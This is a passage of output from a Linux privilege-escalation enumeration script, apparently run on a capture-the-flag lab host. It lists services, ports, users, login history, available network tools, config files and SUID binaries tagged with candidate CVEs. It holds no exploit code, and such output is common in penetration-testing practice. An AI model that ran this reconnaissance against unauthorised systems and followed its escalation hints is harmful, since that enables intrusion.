Possible weak user policy found on /etc/dbus-1/system.d/org.freedesktop.thermald.conf (        <policy group="power">)

╔══════════╣ D-Bus Service Objects list
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#d-bus                 
NAME                            PID PROCESS         USER             CONNECTION    UNIT                        SESSION DESCRIPTION
:1.0                            475 systemd-network systemd-network  :1.0          systemd-networkd.service    -       -
:1.1                            654 systemd-resolve systemd-resolve  :1.1          systemd-resolved.service    -       -
:1.14                         21629 busctl          pericles         :1.14         apache2.service             -       -                                                          
:1.2                            841 systemd-logind  root             :1.2          systemd-logind.service      -       -
:1.3                            656 systemd-timesyn systemd-timesync :1.3          systemd-timesyncd.service   -       -
:1.4                              1 systemd         root             :1.4          init.scope                  -       -
:1.6                            764 accounts-daemon[0m root             :1.6          accounts-daemon.service     -       -
:1.7                            798 networkd-dispat root             :1.7          networkd-dispatcher.service -       -
:1.8                            940 polkitd         root             :1.8          polkit.service              -       -
com.ubuntu.LanguageSelector       - -               -                (activatable) -                           -       -
com.ubuntu.SoftwareProperties     - -               -                (activatable) -                           -       -
org.freedesktop.Accounts        764 accounts-daemon[0m root             :1.6          accounts-daemon.service     -       -
org.freedesktop.DBus              1 systemd         root             -             init.scope                  -       -
org.freedesktop.PackageKit        - -               -                (activatable) -                           -       -
org.freedesktop.PolicyKit1      940 polkitd         root             :1.8          polkit.service              -       -
org.freedesktop.bolt              - -               -                (activatable) -                           -       -
org.freedesktop.fwupd             - -               -                (activatable) -                           -       -
org.freedesktop.hostname1         - -               -                (activatable) -                           -       -
org.freedesktop.locale1           - -               -                (activatable) -                           -       -
org.freedesktop.login1          841 systemd-logind  root             :1.2          systemd-logind.service      -       -
org.freedesktop.network1        475 systemd-network systemd-network  :1.0          systemd-networkd.service    -       -
org.freedesktop.resolve1        654 systemd-resolve systemd-resolve  :1.1          systemd-resolved.service    -       -
org.freedesktop.systemd1          1 systemd         root             :1.4          init.scope                  -       -
org.freedesktop.thermald          - -               -                (activatable) -                           -       -
org.freedesktop.timedate1         - -               -                (activatable) -                           -       -
org.freedesktop.timesync1       656 systemd-timesyn systemd-timesync :1.3          systemd-timesyncd.service   -       -


                              ╔═════════════════════╗
══════════════════════════════╣ Network Information ╠══════════════════════════════      
                              ╚═════════════════════╝                                    
╔══════════╣ Hostname, hosts and DNS
time                                                                                     
127.0.0.1 localhost
127.0.1.1 time

::1     ip6-localhost ip6-loopback
fe00::0 ip6-localnet
ff00::0 ip6-mcastprefix
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters

nameserver 127.0.0.53
options edns0

╔══════════╣ Interfaces
# symbolic names for networks, see networks(5) for more information                      
link-local 169.254.0.0
ens160: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 10.10.10.214  netmask 255.255.255.0  broadcast 10.10.10.255
        inet6 fe80::250:56ff:feb9:3225  prefixlen 64  scopeid 0x20<link>
        inet6 dead:beef::250:56ff:feb9:3225  prefixlen 64  scopeid 0x0<global>
        ether 00:50:56:b9:32:25  txqueuelen 1000  (Ethernet)
        RX packets 961829  bytes 65454081 (65.4 MB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 355552  bytes 21291184 (21.2 MB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10<host>
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 12430  bytes 884182 (884.1 KB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 12430  bytes 884182 (884.1 KB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0


╔══════════╣ Active Ports
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#open-ports            
tcp        0      0 127.0.0.53:53           0.0.0.0:*               LISTEN      -                   
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      -                   
tcp6       0      0 :::80                   :::*                    LISTEN      -                   
tcp6       0      0 :::22                   :::*                    LISTEN      -                   

╔══════════╣ Can I sniff with tcpdump?
No                                                                                       
                                                                                         


                               ╔═══════════════════╗
═══════════════════════════════╣ Users Information ╠═══════════════════════════════      
                               ╚═══════════════════╝                                     
╔══════════╣ My user
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#users                 
uid=1000(pericles) gid=1000(pericles) groups=1000(pericles)                              

╔══════════╣ Do I have PGP keys?
/usr/bin/gpg                                                                             
netpgpkeys Not Found
netpgp Not Found                                                                         
                                                                                         
╔══════════╣ Checking 'sudo -l', /etc/sudoers, and /etc/sudoers.d
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-and-suid         
                                                                                         
╔══════════╣ Checking sudo tokens
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#reusing-sudo-tokens   
ptrace protection is enabled (3)                                                         

╔══════════╣ Checking Pkexec policy
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation/interesting-groups-linux-pe#pe-method-2                                                                        
                                                                                         
[Configuration]
AdminIdentities=unix-user:0
[Configuration]
AdminIdentities=unix-group:sudo;unix-group:admin

╔══════════╣ Superusers
root:x:0:0:root:/root:/bin/bash                                                          

╔══════════╣ Users with console
pericles:x:1000:1000:Pericles:/home/pericles:/bin/bash                                   
root:x:0:0:root:/root:/bin/bash

╔══════════╣ All users & groups
uid=0(root) gid=0(root) groups=0(root)                                                   
uid=1(daemon[0m) gid=1(daemon[0m) groups=1(daemon[0m)
uid=10(uucp) gid=10(uucp) groups=10(uucp)
uid=100(systemd-network) gid=102(systemd-network) groups=102(systemd-network)
uid=1000(pericles) gid=1000(pericles) groups=1000(pericles)
uid=101(systemd-resolve) gid=103(systemd-resolve) groups=103(systemd-resolve)
uid=102(systemd-timesync) gid=104(systemd-timesync) groups=104(systemd-timesync)
uid=103(messagebus) gid=106(messagebus) groups=106(messagebus)
uid=104(syslog) gid=110(syslog) groups=110(syslog),4(adm)
uid=105(_apt) gid=65534(nogroup) groups=65534(nogroup)
uid=106(tss) gid=111(tss) groups=111(tss)
uid=107(uuidd) gid=112(uuidd) groups=112(uuidd)
uid=108(tcpdump) gid=113(tcpdump) groups=113(tcpdump)
uid=109(landscape) gid=115(landscape) groups=115(landscape)
uid=110(pollinate) gid=1(daemon[0m) groups=1(daemon[0m)
uid=111(sshd) gid=65534(nogroup) groups=65534(nogroup)
uid=112(mysql) gid=118(mysql) groups=118(mysql)
uid=13(proxy) gid=13(proxy) groups=13(proxy)
uid=2(bin) gid=2(bin) groups=2(bin)
uid=3(sys) gid=3(sys) groups=3(sys)
uid=33(www-data) gid=33(www-data) groups=33(www-data)
uid=34(backup) gid=34(backup) groups=34(backup)
uid=38(list) gid=38(list) groups=38(list)
uid=39(irc) gid=39(irc) groups=39(irc)
uid=4(sync) gid=65534(nogroup) groups=65534(nogroup)
uid=41(gnats) gid=41(gnats) groups=41(gnats)
uid=5(games) gid=60(games) groups=60(games)
uid=6(man) gid=12(man) groups=12(man)
uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup)
uid=7(lp) gid=7(lp) groups=7(lp)
uid=8(mail) gid=8(mail) groups=8(mail)
uid=9(news) gid=9(news) groups=9(news)
uid=998(lxd) gid=100(users) groups=100(users)
uid=999(systemd-coredump) gid=999(systemd-coredump) groups=999(systemd-coredump)

╔══════════╣ Login now
 13:42:41 up  1:16,  0 users,  load average: 0.56, 0.17, 0.24                            
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT

╔══════════╣ Last logons
reboot   system boot  Fri Sep 25 15:06:26 2020 - Fri Sep 25 15:13:55 2020  (00:07)     0.0.0.0
pericles pts/0        Mon Sep 21 02:11:17 2020 - Mon Sep 21 05:10:27 2020  (02:59)     192.168.0.104
pericles pts/0        Mon Sep 21 01:19:31 2020 - Mon Sep 21 02:10:46 2020  (00:51)     192.168.0.104
pericles tty1         Mon Sep 21 01:19:03 2020 - down                      (05:52)     0.0.0.0
reboot   system boot  Mon Sep 21 00:59:22 2020 - Mon Sep 21 07:11:25 2020  (06:12)     0.0.0.0
pericles pts/0        Sun Sep 20 13:54:46 2020 - Sun Sep 20 16:27:24 2020  (02:32)     192.168.0.103
pericles tty1         Sun Sep 20 13:53:52 2020 - down                      (02:33)     0.0.0.0
reboot   system boot  Sun Sep 20 12:07:06 2020 - Sun Sep 20 16:27:35 2020  (04:20)     0.0.0.0

wtmp begins Sun Sep 20 12:07:06 2020

╔══════════╣ Last time logon each user
Username         Port     From             Latest                                        
root             tty1                      Thu Dec 16 14:58:37 +0000 2021
pericles         pts/0    10.10.14.5       Fri Oct 23 09:19:19 +0000 2020
root             tty1                      Thu Dec 16 14:58:37 +0000 2021

╔══════════╣ Do not forget to test 'su' as any other user with shell: without password and with their names as password (I don't do it in FAST mode...)                           
                                                                                         
╔══════════╣ Do not forget to execute 'sudo -l' without password or with valid password (if you know it)!!                                                                        
                                                                                         


                             ╔══════════════════════╗
═════════════════════════════╣ Software Information ╠═════════════════════════════       
                             ╚══════════════════════╝                                    
╔══════════╣ Useful software
/usr/bin/base64                                                                          
/usr/bin/curl
/snap/bin/lxc
/usr/bin/nc
/usr/bin/netcat
/usr/bin/perl
/usr/bin/php
/usr/bin/ping
/usr/bin/python3
/usr/bin/ruby
/usr/bin/sudo
/usr/bin/wget

╔══════════╣ Installed Compilers
                                                                                         
╔══════════╣ Searching mysql credentials and exec
From '/etc/mysql/mysql.conf.d/mysqld.cnf' Mysql user: user              = mysql          

╔══════════╣ Analyzing MariaDB Files (limit 70)
                                                                                         
-rw------- 1 root root 317 Sep 21  2020 /etc/mysql/debian.cnf

╔══════════╣ Analyzing Apache-Nginx Files (limit 70)
Apache version: Server version: Apache/2.4.41 (Ubuntu)                                   
Server built:   2020-08-12T19:46:17
httpd Not Found
                                                                                         
Nginx version: nginx Not Found
                                                                                         
/etc/apache2/mods-enabled/php7.4.conf-<FilesMatch ".+\.ph(ar|p|tml)$">
/etc/apache2/mods-enabled/php7.4.conf:    SetHandler application/x-httpd-php
--
/etc/apache2/mods-enabled/php7.4.conf-<FilesMatch ".+\.phps$">
/etc/apache2/mods-enabled/php7.4.conf:    SetHandler application/x-httpd-php-source
--
/etc/apache2/mods-available/php7.4.conf-<FilesMatch ".+\.ph(ar|p|tml)$">
/etc/apache2/mods-available/php7.4.conf:    SetHandler application/x-httpd-php
--
/etc/apache2/mods-available/php7.4.conf-<FilesMatch ".+\.phps$">
/etc/apache2/mods-available/php7.4.conf:    SetHandler application/x-httpd-php-source
══╣ PHP exec extensions
drwxr-xr-x 2 root root 4096 Dec 16  2021 /etc/apache2/sites-enabled                      
drwxr-xr-x 2 root root 4096 Dec 16  2021 /etc/apache2/sites-enabled
lrwxrwxrwx 1 root root 35 Sep 21  2020 /etc/apache2/sites-enabled/000-default.conf -> ../sites-available/000-default.conf                                                         
<VirtualHost *:80>
        ServerAdmin webmaster@localhost
        DocumentRoot /var/www/html
        ErrorLog ${APACHE_LOG_DIR}/error.log
        CustomLog ${APACHE_LOG_DIR}/access.log combined
</VirtualHost>


-rw-r--r-- 1 root root 1332 Apr 13  2020 /etc/apache2/sites-available/000-default.conf
<VirtualHost *:80>
        ServerAdmin webmaster@localhost
        DocumentRoot /var/www/html
        ErrorLog ${APACHE_LOG_DIR}/error.log
        CustomLog ${APACHE_LOG_DIR}/access.log combined
</VirtualHost>
lrwxrwxrwx 1 root root 35 Sep 21  2020 /etc/apache2/sites-enabled/000-default.conf -> ../sites-available/000-default.conf
<VirtualHost *:80>
        ServerAdmin webmaster@localhost
        DocumentRoot /var/www/html
        ErrorLog ${APACHE_LOG_DIR}/error.log
        CustomLog ${APACHE_LOG_DIR}/access.log combined
</VirtualHost>

-rw-r--r-- 1 root root 72941 May 26  2020 /etc/php/7.4/apache2/php.ini
allow_url_fopen = On
allow_url_include = Off
odbc.allow_persistent = On
mysqli.allow_persistent = On
pgsql.allow_persistent = On
-rw-r--r-- 1 root root 72539 May 26  2020 /etc/php/7.4/cli/php.ini
allow_url_fopen = On
allow_url_include = Off
odbc.allow_persistent = On
mysqli.allow_persistent = On
pgsql.allow_persistent = On



╔══════════╣ Analyzing Rsync Files (limit 70)
-rw-r--r-- 1 root root 1044 Oct 15  2019 /usr/share/doc/rsync/examples/rsyncd.conf       
[ftp]
        comment = public archive
        path = /var/www/pub
        use chroot = yes
        lock file = /var/lock/rsyncd
        read only = yes
        list = yes
        uid = nobody
        gid = nogroup
        strict modes = yes
        ignore errors = no
        ignore nonreadable = yes
        transfer logging = no
        timeout = 600
        refuse options = checksum dry-run
        dont compress = *.gz *.tgz *.zip *.z *.rpm *.deb *.iso *.bz2 *.tbz


╔══════════╣ Analyzing Ldap Files (limit 70)
The password hash is from the {SSHA} to 'structural'                                     
drwxr-xr-x 2 root root 4096 Dec 16  2021 /etc/ldap

drwxr-xr-x 2 root root 32 Mar 11  2020 /snap/core18/1705/etc/ldap

drwxr-xr-x 2 root root 32 Jul 24  2020 /snap/core18/1885/etc/ldap


╔══════════╣ Searching ssl/ssh files
╔══════════╣ Analyzing SSH Files (limit 70)                                              
                                                                                         




-rw-r--r-- 1 root root 599 Sep 20  2020 /etc/ssh/ssh_host_dsa_key.pub
-rw-r--r-- 1 root root 171 Sep 20  2020 /etc/ssh/ssh_host_ecdsa_key.pub
-rw-r--r-- 1 root root 91 Sep 20  2020 /etc/ssh/ssh_host_ed25519_key.pub
-rw-r--r-- 1 root root 563 Sep 20  2020 /etc/ssh/ssh_host_rsa_key.pub

ChallengeResponseAuthentication no
UsePAM yes
PasswordAuthentication yes
══╣ Some certificates were found (out limited):
/etc/pki/fwupd-metadata/LVFS-CA.pem                                                      
/etc/pki/fwupd/LVFS-CA.pem
/etc/pollinate/entropy.ubuntu.com.pem
/etc/ssl/certs/ACCVRAIZ1.pem
/etc/ssl/certs/AC_RAIZ_FNMT-RCM.pem
/etc/ssl/certs/Actalis_Authentication_Root_CA.pem
/etc/ssl/certs/AffirmTrust_Commercial.pem
/etc/ssl/certs/AffirmTrust_Networking.pem
/etc/ssl/certs/AffirmTrust_Premium.pem
/etc/ssl/certs/AffirmTrust_Premium_ECC.pem
/etc/ssl/certs/Amazon_Root_CA_1.pem
/etc/ssl/certs/Amazon_Root_CA_2.pem
/etc/ssl/certs/Amazon_Root_CA_3.pem
/etc/ssl/certs/Amazon_Root_CA_4.pem
/etc/ssl/certs/Atos_TrustedRoot_2011.pem
/etc/ssl/certs/Autoridad_de_Certificacion_Firmaprofesional_CIF_A62634068.pem
/etc/ssl/certs/Baltimore_CyberTrust_Root.pem
/etc/ssl/certs/Buypass_Class_2_Root_CA.pem
/etc/ssl/certs/Buypass_Class_3_Root_CA.pem
/etc/ssl/certs/CA_Disig_Root_R2.pem
14249PSTORAGE_CERTSBIN

══╣ Writable ssh and gpg agents
/etc/systemd/user/sockets.target.wants/gpg-agent-browser.socket                          
/etc/systemd/user/sockets.target.wants/gpg-agent-extra.socket
/etc/systemd/user/sockets.target.wants/gpg-agent.socket
/etc/systemd/user/sockets.target.wants/gpg-agent-ssh.socket
══╣ Some home ssh config file was found
/usr/share/openssh/sshd_config                                                           
Include /etc/ssh/sshd_config.d/*.conf
ChallengeResponseAuthentication no
UsePAM yes
X11Forwarding yes
PrintMotd no
AcceptEnv LANG LC_*
Subsystem       sftp    /usr/lib/openssh/sftp-server

══╣ /etc/hosts.allow file found, trying to read the rules:
/etc/hosts.allow                                                                         


Searching inside /etc/ssh/ssh_config for interesting info
Include /etc/ssh/ssh_config.d/*.conf
Host *
    SendEnv LANG LC_*
    HashKnownHosts yes
    GSSAPIAuthentication yes

╔══════════╣ Analyzing PAM Auth Files (limit 70)
drwxr-xr-x 2 root root 4096 Dec 16  2021 /etc/pam.d                                      
-rw-r--r-- 1 root root 2133 May 29  2020 /etc/pam.d/sshd
account    required     pam_nologin.so
session [success=ok ignore=ignore module_unknown=ignore default=bad]        pam_selinux.so close
session    required     pam_loginuid.so
session    optional     pam_keyinit.so force revoke
session    optional     pam_motd.so  motd=/run/motd.dynamic
session    optional     pam_motd.so noupdate
session    optional     pam_mail.so standard noenv # [1]
session    required     pam_limits.so
session    required     pam_env.so # [1]
session    required     pam_env.so user_readenv=1 envfile=/etc/default/locale
session [success=ok ignore=ignore module_unknown=ignore default=bad]        pam_selinux.so open




╔══════════╣ Searching tmux sessions
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#open-shell-sessions   
tmux 3.0a                                                                                


/tmp/tmux-1000
╔══════════╣ Analyzing Cloud Init Files (limit 70)
-rw-r--r-- 1 root root 3517 Jan 15  2020 /snap/core18/1705/etc/cloud/cloud.cfg           
     lock_passwd: True
-rw-r--r-- 1 root root 3517 Jun  3  2020 /snap/core18/1885/etc/cloud/cloud.cfg
     lock_passwd: True

╔══════════╣ Analyzing Keyring Files (limit 70)
drwxr-xr-x 2 root root 200 Mar 11  2020 /snap/core18/1705/usr/share/keyrings             
drwxr-xr-x 2 root root 200 Jul 24  2020 /snap/core18/1885/usr/share/keyrings
drwxr-xr-x 2 root root 4096 Dec 16  2021 /usr/share/keyrings




╔══════════╣ Searching uncommon passwd files (splunk)
passwd file: /etc/pam.d/passwd                                                           
passwd file: /etc/passwd
passwd file: /snap/core18/1705/etc/pam.d/passwd
passwd file: /snap/core18/1705/etc/passwd
passwd file: /snap/core18/1705/usr/share/bash-completion/completions/passwd
passwd file: /snap/core18/1705/usr/share/lintian/overrides/passwd
passwd file: /snap/core18/1705/var/lib/extrausers/passwd
passwd file: /snap/core18/1885/etc/pam.d/passwd
passwd file: /snap/core18/1885/etc/passwd
passwd file: /snap/core18/1885/usr/share/bash-completion/completions/passwd
passwd file: /snap/core18/1885/usr/share/lintian/overrides/passwd
passwd file: /snap/core18/1885/var/lib/extrausers/passwd
passwd file: /usr/share/bash-completion/completions/passwd
passwd file: /usr/share/lintian/overrides/passwd

╔══════════╣ Analyzing PGP-GPG Files (limit 70)
/usr/bin/gpg                                                                             
netpgpkeys Not Found
netpgp Not Found                                                                         
                                                                                         
-rw-r--r-- 1 root root 2796 Apr  9  2020 /etc/apt/trusted.gpg.d/ubuntu-keyring-2012-archive.gpg
-rw-r--r-- 1 root root 2794 Apr  9  2020 /etc/apt/trusted.gpg.d/ubuntu-keyring-2012-cdimage.gpg
-rw-r--r-- 1 root root 1733 Apr  9  2020 /etc/apt/trusted.gpg.d/ubuntu-keyring-2018-archive.gpg
-rw------- 1 pericles pericles 1200 Oct  2  2020 /home/pericles/.gnupg/trustdb.gpg
-rw-r--r-- 1 root root 7399 Sep 17  2018 /snap/core18/1705/usr/share/keyrings/ubuntu-archive-keyring.gpg
-rw-r--r-- 1 root root 6713 Oct 27  2016 /snap/core18/1705/usr/share/keyrings/ubuntu-archive-removed-keys.gpg
-rw-r--r-- 1 root root 4097 Feb  6  2018 /snap/core18/1705/usr/share/keyrings/ubuntu-cloudimage-keyring.gpg
-rw-r--r-- 1 root root 0 Jan 17  2018 /snap/core18/1705/usr/share/keyrings/ubuntu-cloudimage-removed-keys.gpg
-rw-r--r-- 1 root root 1227 May 27  2010 /snap/core18/1705/usr/share/keyrings/ubuntu-master-keyring.gpg
-rw-r--r-- 1 root root 7399 Sep 17  2018 /snap/core18/1885/usr/share/keyrings/ubuntu-archive-keyring.gpg
-rw-r--r-- 1 root root 6713 Oct 27  2016 /snap/core18/1885/usr/share/keyrings/ubuntu-archive-removed-keys.gpg
-rw-r--r-- 1 root root 4097 Feb  6  2018 /snap/core18/1885/usr/share/keyrings/ubuntu-cloudimage-keyring.gpg
-rw-r--r-- 1 root root 0 Jan 17  2018 /snap/core18/1885/usr/share/keyrings/ubuntu-cloudimage-removed-keys.gpg
-rw-r--r-- 1 root root 1227 May 27  2010 /snap/core18/1885/usr/share/keyrings/ubuntu-master-keyring.gpg
-rw-r--r-- 1 root root 3267 Mar 10  2020 /usr/share/gnupg/distsigkey.gpg
-rw-r--r-- 1 root root 2236 Mar 30  2020 /usr/share/keyrings/ubuntu-advantage-esm-apps.gpg                                                                                        
-rw-r--r-- 1 root root 2264 Mar 30  2020 /usr/share/keyrings/ubuntu-advantage-esm-infra-trusty.gpg
-rw-r--r-- 1 root root 7399 Sep 17  2018 /usr/share/keyrings/ubuntu-archive-keyring.gpg
-rw-r--r-- 1 root root 6713 Oct 27  2016 /usr/share/keyrings/ubuntu-archive-removed-keys.gpg                                                                                      
-rw-r--r-- 1 root root 4097 Feb  6  2018 /usr/share/keyrings/ubuntu-cloudimage-keyring.gpg                                                                                        
-rw-r--r-- 1 root root 0 Jan 17  2018 /usr/share/keyrings/ubuntu-cloudimage-removed-keys.gpg                                                                                      
-rw-r--r-- 1 root root 1227 May 27  2010 /usr/share/keyrings/ubuntu-master-keyring.gpg
-rw-r--r-- 1 root root 2867 Feb 13  2020 /usr/share/popularity-contest/debian-popcon.gpg

drwx------ 3 pericles pericles 4096 Jan 13 13:42 /home/pericles/.gnupg


╔══════════╣ Analyzing Postfix Files (limit 70)
-rw-r--r-- 1 root root 675 Apr  2  2018 /snap/core18/1705/usr/share/bash-completion/completions/postfix

-rw-r--r-- 1 root root 675 Apr  2  2018 /snap/core18/1885/usr/share/bash-completion/completions/postfix

-rw-r--r-- 1 root root 813 Feb  2  2020 /usr/share/bash-completion/completions/postfix


╔══════════╣ Analyzing FTP Files (limit 70)
                                                                                         


-rw-r--r-- 1 root root 69 May 26  2020 /etc/php/7.4/mods-available/ftp.ini
-rw-r--r-- 1 root root 69 Oct  6  2020 /usr/share/php7.4-common/common/ftp.ini






╔══════════╣ Analyzing DNS Files (limit 70)
-rw-r--r-- 1 root root 832 Feb  2  2020 /usr/share/bash-completion/completions/bind      
-rw-r--r-- 1 root root 832 Feb  2  2020 /usr/share/bash-completion/completions/bind




╔══════════╣ Analyzing Other Interesting Files (limit 70)
-rw-r--r-- 1 root root 3771 Feb 25  2020 /etc/skel/.bashrc                               
-rw-r--r-- 1 pericles pericles 3771 Feb 25  2020 /home/pericles/.bashrc
-rw-r--r-- 1 root root 3771 Apr  4  2018 /snap/core18/1705/etc/skel/.bashrc
-rw-r--r-- 1 root root 3771 Apr  4  2018 /snap/core18/1885/etc/skel/.bashrc





-rw-r--r-- 1 root root 807 Feb 25  2020 /etc/skel/.profile
-rw-r--r-- 1 pericles pericles 807 Feb 25  2020 /home/pericles/.profile
-rw-r--r-- 1 root root 807 Apr  4  2018 /snap/core18/1705/etc/skel/.profile
-rw-r--r-- 1 root root 807 Apr  4  2018 /snap/core18/1885/etc/skel/.profile






                      ╔════════════════════════════════════╗
══════════════════════╣ Files with Interesting Permissions ╠══════════════════════       
                      ╚════════════════════════════════════╝                             
╔══════════╣ SUID - Check easy privesc, exploits and write perms
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-and-suid         
strings Not Found                                                                        
-rwsr-xr-x 1 root root 23K Aug 16  2019 /usr/lib/policykit-1/polkit-agent-helper-1       
-rwsr-xr-x 1 root root 463K May 29  2020 /usr/lib/openssh/ssh-keysign
-rwsr-xr-x 1 root root 128K Jul 10  2020 /usr/lib/snapd/snap-confine  --->  Ubuntu_snapd<2.37_dirty_sock_Local_Privilege_Escalation(CVE-2019-7304)                                
-rwsr-xr-- 1 root messagebus 51K Jun 11  2020 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 15K Jul  8  2019 /usr/lib/eject/dmcrypt-get-device
-rwsr-sr-x 1 daemon daemon 55K Nov 12  2018 /usr/bin/at  --->  RTru64_UNIX_4.0g(CVE-2002-1614)                                                                                    
-rwsr-xr-x 1 root root 39K Mar  7  2020 /usr/bin/fusermount
-rwsr-xr-x 1 root root 84K Apr 16  2020 /usr/bin/chfn  --->  SuSE_9.3/10
-rwsr-xr-x 1 root root 31K Aug 16  2019 /usr/bin/pkexec  --->  Linux4.10_to_5.1.17(CVE-2019-13272)/rhel_6(CVE-2011-1485)                                                          
-rwsr-xr-x 1 root root 55K Apr  2  2020 /usr/bin/mount  --->  Apple_Mac_OSX(Lion)_Kernel_xnu-1699.32.7_except_xnu-1699.24.8                                                       
-rwsr-xr-x 1 root root 163K Jan 19  2021 /usr/bin/sudo  --->  check_if_the_sudo_version_is_vulnerable                                                                             
-rwsr-xr-x 1 root root 67K Apr  2  2020 /usr/bin/su
-rwsr-xr-x 1 root root 87K Apr 16  2020 /usr/bin/gpasswd
-rwsr-xr-x 1 root root 39K Apr  2  2020 /usr/bin/umount  --->  BSD/Linux(08-1996)
-rwsr-xr-x 1 root root 52K Apr 16  2020 /usr/bin/chsh
-rwsr-xr-x 1 root root 67K Apr 16  2020 /usr/bin/passwd  --->  Apple_Mac_OSX(03-2006)/Solaris_8/9(12-2004)/SPARC_8/9/Sun_Solaris_2.3_to_2.5.1(02-1997)                            
-rwsr-xr-x 1 root root 44K Apr 16  2020 /usr/bin/newgrp  --->  HP-UX_10.20
-rwsr-xr-x 1 root root 109K Oct  8  2020 /snap/snapd/9721/usr/lib/snapd/snap-confine  --->  Ubuntu_snapd<2.37_dirty_sock_Local_Privilege_Escalation(CVE-2019-7304)                
-rwsr-xr-x 1 root root 109K Sep 30  2020 /snap/snapd/9607/usr/lib/snapd/snap-confine  --->  Ubuntu_snapd<2.37_dirty_sock_Local_Privilege_Escalation(CVE-2019-7304)                
-rwsr-xr-x 1 root root 43K Jan  8  2020 /snap/core18/1705/bin/mount  --->  Apple_Mac_OSX(Lion)_Kernel_xnu-1699.32.7_except_xnu-1699.24.8                                          
-rwsr-xr-x 1 root root 63K Jun 28  2019 /snap/core18/1705/bin/ping
-rwsr-xr-x 1 root root 44K Mar 22  2019 /snap/core18/1705/bin/su
-rwsr-xr-x 1 root root 27K Jan  8  2020 /snap/core18/1705/bin/umount  --->  BSD/Linux(08-1996)                                                                                    
-rwsr-xr-x 1 root root 75K Mar 22  2019 /snap/core18/1705/usr/bin/chfn  --->  SuSE_9.3/10
-rwsr-xr-x 1 root root 44K Mar 22  2019 /snap/core18/1705/usr/bin/chsh
-rwsr-xr-x 1 root root 75K Mar 22  2019 /snap/core18/1705/usr/bin/gpasswd
-rwsr-xr-x 1 root root 40K Mar 22  2019 /snap/core18/1705/usr/bin/newgrp  --->  HP-UX_10.20                                                                                       
-rwsr-xr-x 1 root root 59K Mar 22  2019 /snap/core18/1705/usr/bin/passwd  --->  Apple_Mac_OSX(03-2006)/Solaris_8/9(12-2004)/SPARC_8/9/Sun_Solaris_2.3_to_2.5.1(02-1997)           
-rwsr-xr-x 1 root root 146K Jan 31  2020 /snap/core18/1705/usr/bin/sudo  --->  check_if_the_sudo_version_is_vulnerable                                                            
-rwsr-xr-- 1 root systemd-resolve 42K Jun 10  2019 /snap/core18/1705/usr/lib/dbus-1.0/dbus-daemon-launch-helper                                                                   
-rwsr-xr-x 1 root root 427K Mar  4  2019 /snap/core18/1705/usr/lib/openssh/ssh-keysign
-rwsr-xr-x 1 root root 43K Mar  5  2020 /snap/core18/1885/bin/mount  --->  Apple_Mac_OSX(Lion)_Kernel_xnu-1699.32.7_except_xnu-1699.24.8                                          
-rwsr-xr-x 1 root root 63K Jun 28  2019 /snap/core18/1885/bin/ping
-rwsr-xr-x 1 root root 44K Mar 22  2019 /snap/core18/1885/bin/su
-rwsr-xr-x 1 root root 27K Mar  5  2020 /snap/core18/1885/bin/umount  --->  BSD/Linux(08-1996)                                                                                    
-rwsr-xr-x 1 root root 75K Mar 22  2019 /snap/core18/1885/usr/bin/chfn  --->  SuSE_9.3/10
-rwsr-xr-x 1 root root 44K Mar 22  2019 /snap/core18/1885/usr/bin/chsh
-rwsr-xr-x 1 root root 75K Mar 22  2019 /snap/core18/1885/usr/bin/gpasswd
-rwsr-xr-x 1 root root 40K Mar 22  2019 /snap/core18/1885/usr/bin/newgrp  --->  HP-UX_10.20                                                                                       
-rwsr-xr-x 1 root root 59K Mar 22  2019 /snap/core18/1885/usr/bin/passwd  --->  Apple_Mac_OSX(03-2006)/Solaris_8/9(12-2004)/SPARC_8/9/Sun_Solaris_2.3_to_2.5.1(02-1997)           
-rwsr-xr-x 1 root root 146K Jan 31  2020 /snap/core18/1885/usr/bin/sudo  --->  check_if_the_sudo_version_is_vulnerable                                                            
-rwsr-xr-- 1 root systemd-resolve 42K Jun 11  2020 /snap/core18/1885/usr/lib/dbus-1.0/dbus-daemon-launch-helper                                                                   
-rwsr-xr-x 1 root root 427K Mar  4  2019 /snap/core18/1885/usr/lib/openssh/ssh-keysign

╔══════════╣ SGID
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-and-suid         
-rwxr-sr-x 1 root utmp 15K Sep 30  2019 /usr/lib/x86_64-linux-gnu/utempter/utempter      
-rwsr-sr-x 1 daemon daemon 55K Nov 12  2018 /usr/bin/at  --->  RTru64_UNIX_4.0g(CVE-2002-1614)                                                                                    
-rwxr-sr-x 1 root ssh 343K May 29  2020 /usr/bin/ssh-agent
-rwxr-sr-x 1 root shadow 31K Apr 16  2020 /usr/bin/expiry
-rwxr-sr-x 1 root crontab 43K Feb 13  2020 /usr/bin/crontab
-rwxr-sr-x 1 root shadow 83K Apr 16  2020 /usr/bin/chage
-rwxr-sr-x 1 root tty 15K Mar 30  2020 /usr/bin/bsd-write
-rwxr-sr-x 1 root tty 35K Apr  2  2020 /usr/bin/wall
-rwxr-sr-x 1 root shadow 43K Dec 17  2019 /usr/sbin/unix_chkpwd
-rwxr-sr-x 1 root shadow 43K Dec 17  2019 /usr/sbin/pam_extrausers_chkpwd
-rwxr-sr-x 1 root shadow 34K Feb 27  2019 /snap/core18/1705/sbin/pam_extrausers_chkpwd
